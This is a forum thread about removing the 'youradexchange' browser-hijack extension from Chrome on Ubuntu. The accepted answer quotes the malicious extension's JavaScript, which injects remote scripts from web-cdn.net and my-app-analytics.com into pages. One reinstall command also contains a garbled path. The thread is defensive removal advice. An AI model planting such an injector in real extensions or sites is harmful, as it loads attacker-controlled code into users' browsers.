# remove youradexchange malware from chrome

Tags: google-chrome, malware

Does anyone have experience removing the 'youradexchange.com' browser hijack on ubuntu? I find a lot of information regarding this for Windows, but there is nothing for linux. When I am using Chrome, I always see, "waiting for my-app-analytics.com". Googling has led me to believe it is related to the browser hijack.

Comment: Try completely removing chrome and then install it.

Answer (score 6, accepted):

I have exactly the same issue.

I manage to remove the malware extension from my ubuntu machine.

The extension is saved under :

```
/home/user/.config/chromium/Default/Extensions/gpomcmpdonjdffeabllcklpbnfdknnko
```

But it could be saved under another folder name. You can find it searching for this file :

```
find -name gui_web.js
```

Just delete this folder, and it should be fixed.

the content of this file is explicit :

```
var app  = document.createElement('script');
app.type = 'text/javascript';
app.src  = '//www.web-cdn.net/cdn/web.js';
document.getElementsByTagName("head")[0].appendChild(app);
```

It downloads this script web.js which content is :

```
var app  = document.createElement('script');
app.type = 'text/javascript';
app.src  = '//www.my-app-analytics.com/app-ga.php';
document.getElementsByTagName("head")[0].appendChild(app);
```

Answer (score 1):

If you are running Windows OS, then [this](https://www.removeitvirus.com/how-to-get-rid-of-ads-by-youradexchange-permanently/) post will definitely help, as it did to me. 
Try some similar action to remove the malware from Ubuntu:

1. Check add-ons (`/usr/lib/chromium-browser`) and remove any suspicious (YourAdExchange should be there).
2. Delete Chrome caches (`~/.cache/google-chrome`) and personal files (`~/.config/google-chrome`).
3. Reset homepage to Google.

If the above steps do not work, you may install clamAV (works in some cases).
Hope this helps!

Answer (score 0):

This problem with browser maybe resolved by removing and reinsalling it.

Remove google chrome and its setting completely by executing following command in terminal (<kbd>Ctrl</kbd>+<kbd>Alt</kbd>+<kbd>T</kbd>).

```
sudo apt-get remove google-chrome-stable --purge && rm -rf /.config/google-chrome ~/.cache/google-chrome && sudo rm -rf /etc/default/google-chrome
```

Then reinstall `google-chrome` by executing the following command in Terminal :

```
sudo apt-get install google-chrome-stable
```

Answer (score -1):

If you are having trouble in all browsers or all machines on the same network, it is likely a DNS issue.

You can simply reset your modem.

If you can't, change your machine's DNS with the public one, such as google DNS.